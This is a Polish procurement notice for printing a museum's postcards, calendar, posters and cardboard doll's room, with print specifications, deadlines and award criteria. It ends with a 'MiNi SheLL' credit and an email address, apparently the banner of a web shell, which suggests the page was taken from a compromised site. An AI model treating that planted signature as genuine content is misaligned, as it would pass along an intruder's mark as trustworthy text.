Zadanie realizowane w ramach projektu pn.Ręcznikowa draka dla uczniaka współfinansowanego ze środków   Ministra Kultury i Dziedzictwa Kulturowego  

Pocztówki / reprodukcje

1.	Komplet pocztówek w obwolucie, 5 pocztówek - format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, obwoluta - format 3xA5, 4 bigi, kreda mat. 300 g, kolor 4+1+lakier offsetowy, tekst dwujęzyczny na obwolucie, nakład 400 kompletów ( 5 x 400 szt.)
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 15.10.2015 r.
Termin przekazania materiałów: do 01.10.2015 r.

Plakaty / afisze / kalendarze

1.	Kalendarz, format 420x 295 mm (A2 składane na dwa do formatu A3), jedno bigowanie, poziom, 16 stron formatu A3, kreda 200g, kolor 4+4, szycie zeszytowe, na środku dłuższego boku otwór do zawieszenia, okładka, nakład 1000 szt.
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 01.12.2015 r.
Termin przekazania materiałów: do 15.11.2015 r.
Zadanie realizowane w ramach projektu pn.Ręcznikowa draka dla uczniaka współfinansowanego ze środków   Ministra Kultury i Dziedzictwa Kulturowego  

2.	Plakat, format A3, kreda 180 g, kolor 4+0,  nakład 40 sztuk  
Muzeum dostarczy projekt gotowy do druku
Termin realizacji: do 15.10.2015 r.
Termin przekazania materiałów: do 05.10.2015 r.
Zadanie realizowane w ramach projektu pn. Ręcznikowa draka dla uczniaka współfinansowanego ze środków   Ministra Kultury i Dziedzictwa Kulturowego  

Inne
1.	W białostockim saloniku- kartonowy pokój dla lalek (do samodzielnego sklejania) 
Elementy do wydrukowania:
podłoga: szer. 23 cm, dł. 31 cm, karton 1,5 mm+oklejka po jednej stronie -  papier 80g (bez oklejki pod spodem podłogi), zadrukowany 4+0+folia matowa obustronnie 
ściany: (wg załączonego zdjęcia do SIWZ) wys. 23 cm + 2 cm wypustka do sklejania, szer. 77 cm, 2 bigowania oddzielające powierzchnie ścian + bigowanie oddzielające wypustki do sklejania, karton 1,5 mm+oklejka ubustronnie -  papier 80g, zadrukowany 4+0+folia matowa obustronnie 
Dwie karty o wymiarach 25 x 33 cm z rysunkami przedmiotów i postaci do wyciskania, każdy rysunek z dodatkową powierzchnią do przyklejenia na podłodze, odznaczoną bigowaniem (łącznie 22 rysunki na dwóch kartach), karton 1 mm, oklejka po jednej stronie (bez oklejki pod spodem), papier 80g, zadrukowany 4+0+foilia matowa obustronnie  
Nakład 3.000 egz.
Termin realizacji -  do 02.11.2015 r. 
Termin przekazania materiałów: do 01.10.2015 r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 78.20.00.00-9, 78.22.00.00-5, 78.22.50.00-0, 78.21.00.00-1, 78.12.40.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com